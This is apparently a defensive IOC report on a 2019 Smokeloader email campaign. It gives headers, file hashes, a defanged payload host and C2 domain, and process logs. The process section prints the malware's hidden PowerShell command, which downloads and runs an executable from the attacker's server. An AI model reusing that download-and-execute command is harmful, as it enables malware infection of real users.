- #IOC #OptiData #VR #smokeloader #WSH #LZH #Powershell
- https://pastebin.com/hkskwKvc
- previous contact:
- https://pastebin.com/JmthzrL4
- https://pastebin.com/1scwT0f8
- https://pastebin.com/MP3kCSSh
- FAQ:
- https://radetskiy.wordpress.com/2018/10/19/ioc_smokeloader_111018/
- attack_vector
- --------------
- email attach (lzh) > js > WSH > Powershell > GET > AppData\Local\TempZna40.exe
- (note the path: the downloader writes to '%temp%Zna40.exe' with no separator after %temp%, so the payload lands beside the Temp folder as ...\AppData\Local\TempZna40.exe, not inside it; see proc and drop below)
- email_headers
- --------------
- Received: from relay.hvosting.ua (alt1-relay.hvosting.ua [91.200.40.211])
- by srv8.victim1.com for <user0@victim1.com>;
- Received: from unallocated.sta.mtm.kiev.ua (unknown [178.54.46.113])
- (Authenticated sender: info@engineer3d.com.ua)
- by relay.hvosting.ua for <user0@victim1.com>;
- Thu, 10 Jan 2019 13:31:52 +0200 (EET)
- From: Валя <info@engineer3d.com.ua> (display name "Valya")
- Subject: Добрий день. К оплате за 10-е 2019р (translation: "Good day. For payment for the 10th, 2019")
- To: "user0" <user0@victim1.com>
- files
- --------------
- SHA-256 fdbaae9f0659f43f28db25a4504f53000e465e2cbf97f0fa24e8e35cc37c7550
- File name рахунки.lzh (Ukrainian: "invoices") [LHarc 1.x/ARX archive data [lh0]]
- File size 26.63 KB
- SHA-256 a7b6f4a9afd3687eca4c34ddc9f95738ab1ed890927b9ad91ce596ec5fc08520
- File name Pax_5451_10_01_2019p..docx [Microsoft Word 2007+] - CLEAN
- File size 15.44 KB
- SHA-256 ed7722f33d316f500ae679f53323dd60d1190fb4df680c30ef95ef7b535b2bbd
- File name Pax_5451_10_01_2019p..js [ASCII text]
- File size 11.09 KB
- SHA-256 d992c8f2e5994b959125c4a7598f463e54fa9e26cf4c797dbe3cbc7ac997f878
- File name liter.exe [PE32 executable (GUI) Intel 80386, for MS Windows]
- File size 544 KB
- activity
- **************
- PL_SRC musicaustriallc{.} ru/instadoc/liter.exe
- C2 aviatorssm{.} bit/
- netwrk
- --------------
- 213.183.59.103 musicaustriallc{.} ru GET /instadoc/liter.exe HTTP/1.1 Mozilla/5.0
- (response body is a PE: "!This program cannot be run in DOS mode.")
- comp
- --------------
- (process / PID / proto / local port / remote IP / remote port)
- powershell.exe 3300 TCP 51187 176.53.161.182 80
- proc
- --------------
- "C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\Pax_5451_10_01_2019p..js"
- "C:\Windows\System32\cmd.exe" /c powershell.exe -w hidden -noprofile -executionpolicy bypass $OE = New-Object System.Net.WebClient; $OE.Headers['User-Agent'] = 'Windows'; $OE.downloadfile('h11p:\ musicaustriallc{.} ru/instadoc/liter.exe','%temp%Zna40.exe'); & start %temp%Zna40.exe
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -noprofile -executionpolicy bypass $OE = New-Object System.Net.WebClient; $OE.Headers['User-Agent'] = 'Windows'; $OE.downloadfile('h11p:\ musicaustriallc{.} ru/instadoc/liter.exe','C:\tmpZna40.exe');
- C:\tmpZna40.exe
- C:\Users\support\AppData\Local\TempZna40.exe
- persist
- --------------
- n/a (no persistence observed: the sample detects the VM and sleeps)
- drop
- --------------
- C:\tmpZna40.exe
- C:\Users\support\AppData\Local\TempZna40.exe
- # # #
- https://www.virustotal.com/#/file/fdbaae9f0659f43f28db25a4504f53000e465e2cbf97f0fa24e8e35cc37c7550/details
- https://www.virustotal.com/#/file/a7b6f4a9afd3687eca4c34ddc9f95738ab1ed890927b9ad91ce596ec5fc08520/details
- https://www.virustotal.com/#/file/ed7722f33d316f500ae679f53323dd60d1190fb4df680c30ef95ef7b535b2bbd/details
- https://www.virustotal.com/#/file/d992c8f2e5994b959125c4a7598f463e54fa9e26cf4c797dbe3cbc7ac997f878/details
- https://analyze.intezer.com/#/analyses/3ba6c49c-8901-483a-8d2c-f626b1b4c298
- VR
- @